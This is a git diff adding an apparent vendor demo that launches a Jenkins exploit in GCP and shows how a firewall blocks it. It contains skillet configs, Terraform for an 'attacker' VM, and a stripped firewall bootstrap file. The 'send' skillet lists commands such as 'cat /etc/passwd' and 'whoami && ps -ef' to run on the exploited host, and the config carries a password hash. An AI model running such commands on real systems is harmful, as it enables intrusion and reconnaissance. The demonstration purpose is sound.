Teardown + +description: > + This skillet will destroy the GCP Jenkins Environment. Run this step once the demo is complete. +# type of skillet (panos or panorama or template or terraform) +type: python3 + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. +# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration +# As this skillet is very simple, there is no need to build on another one. +extends: + +# Labels allow grouping and type specific options and are generally only used in advanced cases +labels: + collection: GCP Jenkins Security Framework + +# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application +variables: + - name: username + description: FW Username + default: admin + type_hint: text + - name: password + description: FW Password + default: + type_hint: password + +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: script + file: ../../destroy.py +# output_type: +# outputs: +# - name: app_threat_version +# capture_pattern: result/content-updates/entry/version diff --git a/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml new file mode 100644 index 00000000..539c9b30 --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml @@ -0,0 +1,41 @@ +name: gcp_jenkins_launch +# label used for menu selection +label: GCP Jenkins Security Framework Step 2 Launch exploit + +description: > + This Skillet will launch the Jenkins exploit. You can choose to use the native tools or select PANOS enabled + Security to run the exploit of Jenkins Web application. + +# type of skillet (panos or panorama or template or terraform) +type: python3 + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. +# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration +# As this skillet is very simple, there is no need to build on another one. +extends: + +# Labels allow grouping and type specific options and are generally only used in advanced cases +labels: + collection: GCP Jenkins Security Framework + +# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application +variables: + - name: vector + description: Attack Vector + default: native + type_hint: dropdown + dd_list: + - key: Native WAF + value: native + - key: PAN-OS + value: panos + + +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: payload + file: ../../launch_attack_vector.py \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml new file mode 100644 index 00000000..9f46a8bb --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml @@ -0,0 +1,32 @@ +name: GCP_login +label: GCP Login (Pre-Deployment Step) + +description: | + This skillet will log into GCP. You will be prompted to follow a link and enter a device-code in your browser. +# type of skillet (panos or panorama or template or terraform) +type: template + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. +# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration +# As this skillet is very simple, there is no need to build on another one. +extends: + +# Labels allow grouping and type specific options and are generally only used in advanced cases +labels: + collection: GCP Jenkins Security Framework + +# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application +variables: +# - name: api_key +# description: API Key +# default: abc123 +# type_hint: text + +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: script + file: docker_cmd.j2 diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2 b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2 new file mode 100644 index 00000000..02637f31 --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2 @@ -0,0 +1,25 @@ +To authenticate to GCP, please run the following command: + +Make sure you have a .config directory in you home directory +On either OSX or Windows if the .config directory does not exist in your home directory: + +command from terminal or powershell in user home directory: +mkdir .config + + +Mac OSX- From a terminal window: +docker run -ti --rm -v $HOME/.config:/root/.config google/cloud-sdk gcloud auth application-default login + +Windows- from a powershell: +docker run -ti -p 8888:80 --rm -v /c/Users/%USERNAME%/.config:/root/.config google/cloud-sdk gcloud auth application-default login + +This command will display a link that you should copy into your browser. This will then display a verification +code that you use to authenticate this machine. + + +For more information, see the Google Cloud SDK guide here: + +https://cloud.google.com/sdk/gcloud/ + +And for more information on authenticating, see here: +https://cloud.google.com/sdk/gcloud/reference/auth/application-default/login diff --git a/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml new file mode 100644 index 00000000..5c843d7e --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml @@ -0,0 +1,45 @@ +name: gcp_jenkins_send +# label used for menu selection +label: GCP Jenkins Security Framework Step 3 Send Command + +description: > + This Skillet will allow you to interact and send commands to the exploited Jenkins system. +# type of skillet (panos or panorama or template or terraform) +type: python3 + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. +# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration +# As this skillet is very simple, there is no need to build on another one. +extends: + +# Labels allow grouping and type specific options and are generally only used in advanced cases +labels: + collection: GCP Jenkins Security Framework + +# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application +variables: + - name: cli + description: Command to Send + default: cat /etc/passwd + type_hint: dropdown + dd_list: + - key: "whoami & ps -ef--- Show who you are logged in as and running processes" + value: "whoami && ps -ef" + - key: "cat /etc/passwd--- show the contents of the passwd file" + value: "cat /etc/passwd" + - key: "netstat -a---- showing active tcp sessions" + value: "netstat -a" + - key: "netstat -tn 2>/dev/null |grep :443--- Show active tcp session on port 443" + value: "netstat -tn 2>/dev/null |grep :443" + - name: manual_cli + description: Manual Command to Send + default: '' + type_hint: text +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: payload + file: ../../send_command.py diff --git a/gcp/Jenkins_proj-master/README.md b/gcp/Jenkins_proj-master/README.md new file mode 100644 index 00000000..d76662b1 --- /dev/null +++ b/gcp/Jenkins_proj-master/README.md @@ -0,0 +1,2 @@ +Jenkins_proj +Jenkins Project diff --git a/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf new file mode 100644 index 00000000..d5efe764 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf @@ -0,0 +1,42 @@ +resource "google_compute_instance" "attacker" { + name = "attacker" + project = "${google_project.attacker_project.id}" + zone = "${var.GCP_Zone}" + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + depends_on = [ + "google_storage_bucket_object.config_file_attacker", + "google_project_service.attacker_project" + ] + metadata { + startup-script-url = "gs://${google_storage_bucket.attacker_bucket.name}/initialize_attacker.sh" + serial-port-enable = true + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + "https://www.googleapis.com/auth/compute.readonly", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = "${google_compute_subnetwork.attacker_subnet.self_link}" + network_ip = "${var.Attacker_IP}" + access_config = {} + } + depends_on = ["google_storage_bucket_object.config_file_attacker"] +} diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf new file mode 100644 index 00000000..5221c2dc --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf @@ -0,0 +1,47 @@ +resource "google_storage_bucket" "bootstrap_bucket" { + name = "${var.Victim_Project_Name}-${random_id.project_number.hex}" + storage_class = "REGIONAL" + location = "${var.GCP_Region}" + project = "${google_project.victim_project.id}" +} +resource "google_storage_bucket" "attacker_bucket" { + name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}" + storage_class = "REGIONAL" + location = "${var.GCP_Region}" + project = "${google_project.attacker_project.id}" +} +resource "google_storage_bucket_object" "config_file_webserver" { + name = "initialize_webserver.sh" + source = "scripts/initialize_webserver.sh" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "config_file_attacker" { + name = "initialize_attacker.sh" + source = "scripts/initialize_attacker.sh" + bucket = "${google_storage_bucket.attacker_bucket.name}" +} +resource "google_storage_bucket_object" "bootstrap" { + name = "config/bootstrap.xml" + source = "bootstrap/bootstrap.xml" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "init_cfg" { + name = "config/init-cfg.txt" + source = "bootstrap/init-cfg.txt" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "content" { + name = "content/null.txt" + source = "bootstrap/null.txt" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "software" { + name = "software/null.txt" + source = "bootstrap/null.txt" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "license" { + name = "license/null.txt" + source = "bootstrap/null.txt" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml new file mode 100644 index 00000000..83b66601 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml @@ -0,0 +1,2656 @@ + + + + + + $1$fhfqjgjl$UKU4H9KWTwmKrxropu9BK. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg== + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + Panorama + 1.2.3.4 + test@yourdomain.com + test@yourdomain.com + + + + + + + + + UDP + 514 + BSD + 1.2.3.4 + LOG_USER + + + + + + + + + Sample_Email_Profile + + (severity eq critical) + Email Critical System Logs + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + + traffic + All Logs + no + + Sample_Syslog_Profile + + + + threat + All Logs + no + + Sample_Syslog_Profile + + + + + Sample_Email_Profile + + Email Malicious Wildfire Verdicts + wildfire + (verdict eq malicious) + no + + + + Sample_Email_Profile + + Email Phishing Wildfire Verdicts + wildfire + (verdict eq phishing) + no + + + wildfire + All Logs + no + + Sample_Syslog_Profile + + + + url + All Logs + no + + Sample_Syslog_Profile + + + + data + All Logs + no + + Sample_Syslog_Profile + + + + gtp + All Logs + no + + Sample_Syslog_Profile + + + + tunnel + All Logs + no + + Sample_Syslog_Profile + + + + auth + All Logs + no + + Sample_Syslog_Profile + + + + + + + + + last-7-calendar-days + 500 + 50 + Host-visit malicious sites plus + daily + (category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing) + + + repeatcnt + src + + from + srcuser + category + action + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Hosts visit malicious sites + daily + (category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing) + + + repeatcnt + src + + from + srcuser + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Hosts visit questionable sites + daily + (category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown) + + + repeatcnt + src + + from + srcuser + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Host-visit quest sites plus + daily + (category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown) + Detail of hosts visiting questionable URLs + + + repeatcnt + src + + from + srcuser + category + action + + + repeatcnt + + + + + + last-30-calendar-days + 500 + 10 + Wildfire malicious verdicts + daily + (app neq smtp) and (category neq benign) + Files uploaded or downloaded that were later found to be malicious. This is a summary. Act on real-time email. + + + repeatcnt + + filedigest + container-of-app + app + category + filetype + rule + + + repeatcnt + + + + + + last-30-calendar-days + 500 + 10 + Wildfire verdicts SMTP + daily + (app eq smtp) and (category neq benign) + Links sent from emails found to be malicious. + + + repeatcnt + + filedigest + container-of-app + app + category + filetype + rule + subject + sender + recipient + misc + + + + + + last-30-calendar-days + 500 + 50 + Clients sinkholed + (rule eq 'DNS Sinkhole Block') + daily + + + repeatcnt + from + + src + srcuser + + + repeatcnt + + + + + + + + + + Clients sinkholed + + + Wildfire malicious verdicts + + + Wildfire verdicts SMTP + + + Hosts visit malicious sites + + + Host-visit malicious sites plus + + + Hosts visit questionable sites + + + Host-visit quest sites plus + + + yes + + + Possible Compromise + + + + + + + Possible Compromise + + + + Sample_Email_Profile + + + + + + + + + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + + + + + 2 + 100 + + + + + + 10 + 100 + + + + + + 2 + 100 + + + yes + yes + yes + no + global + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + + + + + + WebFW1 + UTC + updates.paloaltonetworks.com + yes + + + 8.8.8.8 + 10.0.0.2 + + + Gold 1.0 - PANOS 8.0 + + yes + yes + + + + + + + + + + + yes + no + no + no + + + + + + + 00:00 + download-and-install + + 48 + + + + yes + yes + yes + yes + yes + yes + yes + yes + + + + + 3 + download-and-install + + + + + + + + yes + + + FQDN + + + + yes + no + no + no + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg== + 8.8.8.8 + 8.8.4.4 + + + + yes + yes + + + + + 10 + + + 30 + + + 1000 + + + 2000 + + + 5 + + + 5 + + + 1 + + + 10 + + + 2 + + + yes + yes + + + yes + + + no + + + + + + + + + + + + + + + + ELB-HealthChecker/2.0 + http-req-headers + + + + + + + session + no + + + infrastructure + networking + browser-based + 1 + + + + + tcp/80 + + + + + + + + + + + + + GET + + + GoogleHC/ + http-req-headers + + + + + + + session + no + + + ip-protocol + networking + client-server + 1 + + + + + + + + + + + + allow + no + yes + + + Inbound + + + default + + + deny + no + yes + default + + + + + + + + + + + financial-services + government + health-and-medicine + Custom-No-Decrypt + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + yes + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + any + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + + + + + + + Outbound to the Internet + + + Inbound from the Internet + + + Internal to Internal + + +
+ + 2600:5200::1 + + + 10.0.1.10 + +
+ + + + + + + + http://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt + IPv4 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html + + + + + + + + + + http://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt + IPv6 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html + + + + + + + + + + + + + + yes + yes + yes + yes + yes + yes + + + yes + yes + + + no + no + + + yes + yes + + + tls1-2 + no + no + no + no + + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + + + + + any + + + any + + both + alert + + + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + + any + any + single-packet + + + + + + + low + informational + medium + + any + any + disable + + + + + + + + + + + + + + 2600:5200::1 + + disable + + + + + + + + any + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + + + + + extended-capture + + pan-sinkhole-default-ip + ::1 + + + + + + + + + any + + any + any + single-packet + + + + + + + + + + + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + yes + yes + yes + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + + + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + + + yes + yes + yes + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + White-List + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + + + block + yes + yes + yes + no + + White-List + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + + + + + + + + medium + + Black-List + Custom-No-Decrypt + White-List + + + block + yes + yes + yes + no + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + White-List + + + + + + + + alert + alert + + + alert + alert + + + default + default + + + default + default + + + alert + alert + + + default + default + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + default + + + default + default + + + reset-both + reset-both + + + reset-both + reset-both + + + default + default + + + reset-both + reset-both + + + Use this profile for rules needing modifications to the standard + + + + + drop + drop + + + drop + drop + + + drop + drop + + + drop + drop + + + drop + drop + + + drop + drop + + + yes + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + medium + + + any + + any + any + any + disable + + + + + + + + + + + any + + + any + + + any + + any + any + any + disable + + + + + + + + + + + + any + + + critical + high + medium + low + + + any + + any + any + any + single-packet + + + + + + + Internal + + + informational + + + any + + any + any + any + disable + + + + + + + any + + + informational + + + any + + any + any + any + extended-capture + + + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + + Outbound-AV + + + Outbound-AS + + + Outbound-VP + + + Outbound-URL + + + Outbound-FB + + + Outbound-WF + + + + + Inbound-AV + + + Inbound-AS + + + Inbound-VP + + + Inbound-FB + + + Inbound-WF + + + + + 